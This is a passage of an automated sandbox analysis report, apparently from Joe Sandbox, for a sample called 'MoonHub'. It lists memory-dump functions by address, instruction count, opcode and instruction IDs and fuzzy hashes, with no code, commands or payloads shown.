                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ce856a77d48e4f10a636ab9b0299051590c64c459c6be2cc015965c28e926905
                                                                                                                                                                                • Instruction ID: 46a265d0b20be4970d10268bcffabd8d89e52aa4589a0fa597bba6a4ca4e78eb
                                                                                                                                                                                • Opcode Fuzzy Hash: ce856a77d48e4f10a636ab9b0299051590c64c459c6be2cc015965c28e926905
                                                                                                                                                                                • Instruction Fuzzy Hash: 78811D70618A0E8FDB88EF18C494BA973E2FF98741F544569D41EC7295CB35EC92CB40
                                                                                                                                                                                Function 00007FF848E9054D Relevance: .2, Instructions: 219COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ba320608c81508e5c744443df8d3b9a88d7b12256d351c4d2a370cf485acb8f0
                                                                                                                                                                                • Instruction ID: 9562451b1c6789d5ac933bd99989384d287fdfdfadea0211dc6dcc8bdce0c1ea
                                                                                                                                                                                • Opcode Fuzzy Hash: ba320608c81508e5c744443df8d3b9a88d7b12256d351c4d2a370cf485acb8f0
                                                                                                                                                                                • Instruction Fuzzy Hash: B7511423E0D9965FE758BB6CA8561F97B90FF913A5F0800B7D048C7193DE2868068796
                                                                                                                                                                                Function 00007FF848EAB310 Relevance: .2, Instructions: 211COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: cee66ad7468291925bd4f95f3461e2d45af0eee13236822c0af9e87cf2a08f59
                                                                                                                                                                                • Instruction ID: 8f7404b462c3f66b5ff7bc827df5139f5747823ca845bfdd06f16e9358cbee99
                                                                                                                                                                                • Opcode Fuzzy Hash: cee66ad7468291925bd4f95f3461e2d45af0eee13236822c0af9e87cf2a08f59
                                                                                                                                                                                • Instruction Fuzzy Hash: EE512421E0DE8E4FE795AB2848593BA7BD1FF95780F0441BED40DC7292EF38A8058355
                                                                                                                                                                                Function 00007FF848EB7AD0 Relevance: .2, Instructions: 200COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f66baa07c7c2233445f2fbe22698a336f48de4660a2f97f00a1ebb6cc5a7f5b8
                                                                                                                                                                                • Instruction ID: 33ed1e2287fef59e432f0d3ddd70e886cde8d77dd119861a231cdd04e1deabaa
                                                                                                                                                                                • Opcode Fuzzy Hash: f66baa07c7c2233445f2fbe22698a336f48de4660a2f97f00a1ebb6cc5a7f5b8
                                                                                                                                                                                • Instruction Fuzzy Hash: 5B512931A0DA4E1FDBA2FA2898945B27BE2FF65390B1441FAC44CC7196DF39AC46C740
                                                                                                                                                                                Function 00007FF848EA9670 Relevance: .2, Instructions: 200COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2915a7b6ad42a756f86d4230eb9461c930402b3b0e52c8dd62ed949640ca7a0b
                                                                                                                                                                                • Instruction ID: a8345b87bef9862f9924d021f0ed7743d2f820fb66233cc6fc878fbbabaf1986
                                                                                                                                                                                • Opcode Fuzzy Hash: 2915a7b6ad42a756f86d4230eb9461c930402b3b0e52c8dd62ed949640ca7a0b
                                                                                                                                                                                • Instruction Fuzzy Hash: B1516E70B18A498FDB98FE2CC495A7573E1FB98340B10417EE44FC7296DE35E8458B45
                                                                                                                                                                                Function 00007FF848E9D629 Relevance: .2, Instructions: 200COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0a1f1e905dfe71233fc8b8e43eb3ee58a077acd20bbe1ec83f6d45145735614a
                                                                                                                                                                                • Instruction ID: 725e917aa2dfa465ba548cf13cab0a0c7625d1d78398ff7361be03cc90eff639
                                                                                                                                                                                • Opcode Fuzzy Hash: 0a1f1e905dfe71233fc8b8e43eb3ee58a077acd20bbe1ec83f6d45145735614a
                                                                                                                                                                                • Instruction Fuzzy Hash: D761B270209A4A5FDB41EF68C8A5EEAB7E1FF19354F4405F9E459CB252CF38A842CB40
                                                                                                                                                                                Function 00007FF848E90E70 Relevance: .2, Instructions: 199COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 19b2a02b14611e5ef904d89110f8b0a8e20fcce46cef380b7cc8898f2f35a20b
                                                                                                                                                                                • Instruction ID: 929cd76aac16d2da947234646af20c87ba8d5876e9ac9e7f2d5f3f9f36ac8106
                                                                                                                                                                                • Opcode Fuzzy Hash: 19b2a02b14611e5ef904d89110f8b0a8e20fcce46cef380b7cc8898f2f35a20b
                                                                                                                                                                                • Instruction Fuzzy Hash: AD518331E0CA4A8FEB58EBA898556BDB7E2FF98354F140179D00DE3282DB796C018759
                                                                                                                                                                                Function 00007FF848E913ED Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 19881c0c6dc9dcdfea11489fb1f7309c7cab9b53dd43344f2fb9d8dda5be3ebe
                                                                                                                                                                                • Instruction ID: c9c4c002d3a1b01772b3fc69afbd605dc1983a2813384b38d6ee22513f9ee19d
                                                                                                                                                                                • Opcode Fuzzy Hash: 19881c0c6dc9dcdfea11489fb1f7309c7cab9b53dd43344f2fb9d8dda5be3ebe
                                                                                                                                                                                • Instruction Fuzzy Hash: 49713A31D096499FDB85FBA4C8556ECBBB1FF55354F4001B9E449AB2A2CFB82845CF04
                                                                                                                                                                                Function 00007FF848E97230 Relevance: .2, Instructions: 192COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b1fd0058a14f3d8920ad97d106b9d199e386afe087a778b7665219c9b16ac5ea
                                                                                                                                                                                • Instruction ID: c9bfd9f24dbb511576063789de701aac006bc9b4ed1f0bfc2ce23333d6f9984b
                                                                                                                                                                                • Opcode Fuzzy Hash: b1fd0058a14f3d8920ad97d106b9d199e386afe087a778b7665219c9b16ac5ea
                                                                                                                                                                                • Instruction Fuzzy Hash: 98510C3190D7994FE761B73468111E97FE0FF427A4F0902BBD09AC70D3DE2A650A8796
                                                                                                                                                                                Function 00007FF848EAC415 Relevance: .2, Instructions: 191COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 9fa8787bbbe21e0ab93d41d7298573fe1221332f0dcefa6e0f2bb4642619b025
                                                                                                                                                                                • Instruction ID: e956491c5c1deab3533629823a08bdce1a31113c283b27578001045c47724433
                                                                                                                                                                                • Opcode Fuzzy Hash: 9fa8787bbbe21e0ab93d41d7298573fe1221332f0dcefa6e0f2bb4642619b025
                                                                                                                                                                                • Instruction Fuzzy Hash: D951E972A0C6065FEB1CAE1CA8462B977D2FFD5750F04017FF849C3293DE69684246D9
                                                                                                                                                                                Function 00007FF848ED9A60 Relevance: .2, Instructions: 170COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: dfd6b09bd5479f979f7b682650e7c1d69a25c289412cb43e5fc71cf029bd131d
                                                                                                                                                                                • Instruction ID: 18725feed6b7a1b72f4d31af047a06edc4195cee0bc2e6b0f8dbf8a00019c5ea
                                                                                                                                                                                • Opcode Fuzzy Hash: dfd6b09bd5479f979f7b682650e7c1d69a25c289412cb43e5fc71cf029bd131d
                                                                                                                                                                                • Instruction Fuzzy Hash: A741B431E0CE4B8FEBA5EA1894455B6B3E6FF94750F040679D44AC3681DF34F80A8B84
                                                                                                                                                                                Function 00007FF848ED0E10 Relevance: .2, Instructions: 168COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c1678211c74b70e7df01255ab1c25aafc7d3e835a61a25395e461324e274ccef
                                                                                                                                                                                • Instruction ID: a7332a2a546693b139b539ad2499abd812886ab7ea96b51522e1c09ec06eaccb
                                                                                                                                                                                • Opcode Fuzzy Hash: c1678211c74b70e7df01255ab1c25aafc7d3e835a61a25395e461324e274ccef
                                                                                                                                                                                • Instruction Fuzzy Hash: 6B413B30708A084FD6A8EB2CD498B6577D1FF59751F1901BAE48EC7266CE30EC45CB85
                                                                                                                                                                                Function 00007FF848E90A38 Relevance: .2, Instructions: 159COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 41a9b4f666768f6711f9195e5b3895509f241162ce6a67f8ca55d58e16a44fe9
                                                                                                                                                                                • Instruction ID: df5ecc2fab09604790d3f63c9f6296a843552beefada63f471b96e0e57ca9c36
                                                                                                                                                                                • Opcode Fuzzy Hash: 41a9b4f666768f6711f9195e5b3895509f241162ce6a67f8ca55d58e16a44fe9
                                                                                                                                                                                • Instruction Fuzzy Hash: 47516E70908A4E8FDB84EF58C854AEA73F1FF58314F504A69E82AC7295DB74E851CB80
                                                                                                                                                                                Function 00007FF848EAB520 Relevance: .2, Instructions: 157COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 986b0d85374690cc50ea32a345944ecdd1b36107b05b0479fe1636537f8264f5
                                                                                                                                                                                • Instruction ID: f532bd79a3f015d67ba3e444894d38bf953a60ec5b50c2b65ace767787b224f2
                                                                                                                                                                                • Opcode Fuzzy Hash: 986b0d85374690cc50ea32a345944ecdd1b36107b05b0479fe1636537f8264f5
                                                                                                                                                                                • Instruction Fuzzy Hash: 94412930A1CA099FD748FA2CD455A75B7E2FF99750B1401BDE40DC72A2DF34E8818785
                                                                                                                                                                                Function 00007FF848EAC258 Relevance: .2, Instructions: 156COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7b1819ae0c17a70e787f79cb494d655939bc5c40d3b96e87918d43c1c82f8c5b
                                                                                                                                                                                • Instruction ID: 0b06da81a595494d7e1b2b1758ffe6b70b81f1c555bf4d74ff39b8363b632257
                                                                                                                                                                                • Opcode Fuzzy Hash: 7b1819ae0c17a70e787f79cb494d655939bc5c40d3b96e87918d43c1c82f8c5b
                                                                                                                                                                                • Instruction Fuzzy Hash: DA41633171CA054FE7A8E51CA8417B573D2FBD9760F10467EE48EC3682DE36E8464785
                                                                                                                                                                                Function 00007FF848EAC168 Relevance: .2, Instructions: 154COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a6909d918874af4551ee724691db6bd353eddbb90aad29f3518cf4dc8e604f7c
                                                                                                                                                                                • Instruction ID: 63829720964caa8b9a9bce5ae1fb93c0a6dca443f1f7b6ca6cfcdf22e3982a6e
                                                                                                                                                                                • Opcode Fuzzy Hash: a6909d918874af4551ee724691db6bd353eddbb90aad29f3518cf4dc8e604f7c
                                                                                                                                                                                • Instruction Fuzzy Hash: D341E321B1CA4B4FE758BB3C885567577E1FF55785F1446B9D88EC3286EF28E8028384
                                                                                                                                                                                Function 00007FF848EE2368 Relevance: .2, Instructions: 151COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4b83916d851db79dc3f0a931be56c49532ea4ca90c6b37e608f2510829236515
                                                                                                                                                                                • Instruction ID: d5fbda699bf1334ef075813f27e9be47d33039192413296f7ed55cb96066b440
                                                                                                                                                                                • Opcode Fuzzy Hash: 4b83916d851db79dc3f0a931be56c49532ea4ca90c6b37e608f2510829236515
                                                                                                                                                                                • Instruction Fuzzy Hash: F3419F31A0CE964FE7A4E628D084B76B7D1FF54398F084678D08ED3681D77DA885C364
                                                                                                                                                                                Function 00007FF848EA9CA0 Relevance: .2, Instructions: 151COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 29d0fa51c2743aa9e41f5ca8408e6fad2893aaf223cf7a21352c679f13c74434
                                                                                                                                                                                • Instruction ID: ed47defe16511dbc92667b12625c8ffb3c228847b27b2650b54abee611c6a9e7
                                                                                                                                                                                • Opcode Fuzzy Hash: 29d0fa51c2743aa9e41f5ca8408e6fad2893aaf223cf7a21352c679f13c74434
                                                                                                                                                                                • Instruction Fuzzy Hash: 7331AD31B1CE550FE75AB56C74851BA7BC0EFC97A0F1401BBD51EC3197DE2558828386
                                                                                                                                                                                Function 00007FF848E91B55 Relevance: .1, Instructions: 149COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0972b9ef5c75e4eef3d5996927113a23113ee4daf546f1b22253aefac401b74d
                                                                                                                                                                                • Instruction ID: 972c63bb0114a1f14cc0159b97043d3cd22472b1cf84b6a7654c763752e8e42f
                                                                                                                                                                                • Opcode Fuzzy Hash: 0972b9ef5c75e4eef3d5996927113a23113ee4daf546f1b22253aefac401b74d
                                                                                                                                                                                • Instruction Fuzzy Hash: BD51707090CA8A8FDB8CDF18C861A6537A2FF59348F1406ADD45DC72C2DB7AE812C745
                                                                                                                                                                                Function 00007FF848E97D5D Relevance: .1, Instructions: 143COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e4b49371d56c34a3efab5650fae9380bcf1088d7c5b81418ff007e5234fa9355
                                                                                                                                                                                • Instruction ID: 8cc1cd90a88c19c7de6ce9ad4f407de57a77f46c0b57acfd72f980f3b914808d
                                                                                                                                                                                • Opcode Fuzzy Hash: e4b49371d56c34a3efab5650fae9380bcf1088d7c5b81418ff007e5234fa9355
                                                                                                                                                                                • Instruction Fuzzy Hash: 7D41F43190D69A5FD742EBB8C8156EA7FF0FF46254F0901FAD089DB1A3CA685C46C790
                                                                                                                                                                                Function 00007FF848EDA040 Relevance: .1, Instructions: 139COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d1ce79fa3bff6abd5490eb5999f1da11d2bfa5c2db902de5fe56c09ea16c3532
                                                                                                                                                                                • Instruction ID: e1615ca7f0252febfd33b2c6f247e428d987611dc3c0dbc3786445dd8a4f0619
                                                                                                                                                                                • Opcode Fuzzy Hash: d1ce79fa3bff6abd5490eb5999f1da11d2bfa5c2db902de5fe56c09ea16c3532
                                                                                                                                                                                • Instruction Fuzzy Hash: 35410531A0CA074FEA64FA18A4446B973D1FFD43A1F00417AC44EC3692DE39BD8A8A44
                                                                                                                                                                                Function 00007FF848EA0B22 Relevance: .1, Instructions: 137COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d162801e71d62f3a5e9846d1b0577c24c5d1eaf6c45366a883a73944e8f73d65
                                                                                                                                                                                • Instruction ID: 02d3db7014063a1442f8f93c864fc82466458a7c86ce137db3be683b35771a70
                                                                                                                                                                                • Opcode Fuzzy Hash: d162801e71d62f3a5e9846d1b0577c24c5d1eaf6c45366a883a73944e8f73d65
                                                                                                                                                                                • Instruction Fuzzy Hash: 4C411034A18A0ECFDB88FF18C494AAA73E1FF58744F5055A8E41AC7296DB35EC56CB40
                                                                                                                                                                                Function 00007FF848EABAE0 Relevance: .1, Instructions: 136COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b3282d3f10160d95509e1b4fc4ebd4e010cbc309acced908688413cbcd2cbcdb
                                                                                                                                                                                • Instruction ID: 76c2345e3255f8715e63a6f4a3bf4d9d24d8a442cce387482f5f4ab8e4b33204
                                                                                                                                                                                • Opcode Fuzzy Hash: b3282d3f10160d95509e1b4fc4ebd4e010cbc309acced908688413cbcd2cbcdb
                                                                                                                                                                                • Instruction Fuzzy Hash: DE418C3061CB199FDB58FB18C4459B977E1FF99760F1001ADE44A872A2CF38F8428B99
                                                                                                                                                                                Function 00007FF848EAB750 Relevance: .1, Instructions: 131COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c9ba2bcf1fcde61c3a9c93ab0c6ccf0a016293ea271f9142addd27189edd5232
                                                                                                                                                                                • Instruction ID: 12abbb2757bcf3d9cd753aa6d74ba566017fcd20006707c2ac3dc102ec364d82
                                                                                                                                                                                • Opcode Fuzzy Hash: c9ba2bcf1fcde61c3a9c93ab0c6ccf0a016293ea271f9142addd27189edd5232
                                                                                                                                                                                • Instruction Fuzzy Hash: D0415C3070CA094FDAA8EB2CE498B6537D1FF59750F1900B9E48EC72A2CE70AC45CB85
                                                                                                                                                                                Function 00007FF848E9A494 Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 03984cde107cc8458293ac20760bf0bf2a3dc522c5ec2d349b538d08c4d04b3d
                                                                                                                                                                                • Instruction ID: 1d41810e14a8cd4b5ecc8611c95ff514ce7e38328536ec83d06c8f545f9daf9d
                                                                                                                                                                                • Opcode Fuzzy Hash: 03984cde107cc8458293ac20760bf0bf2a3dc522c5ec2d349b538d08c4d04b3d
                                                                                                                                                                                • Instruction Fuzzy Hash: E9314200B8B81E2FE44D7AB4F1561BC1087DF94E80F252834E19ED15C7FE2D2D025146
                                                                                                                                                                                Function 00007FF848E9DE98 Relevance: .1, Instructions: 125COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a41c4c5810388f03b14c03e1f60cef22a91752a57ec1cbe1398a61eed3293caa
                                                                                                                                                                                • Instruction ID: 171bb58d89291e55def218d9876d85e63e571f18586a3e1bfd0f63e5b5e59fc5
                                                                                                                                                                                • Opcode Fuzzy Hash: a41c4c5810388f03b14c03e1f60cef22a91752a57ec1cbe1398a61eed3293caa
                                                                                                                                                                                • Instruction Fuzzy Hash: 84411C6248E7C24FD35383B098355927FB0AE93224B0E46EFD4C0CF4A3E1495A4AC363
                                                                                                                                                                                Function 00007FF848ED9AD0 Relevance: .1, Instructions: 122COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
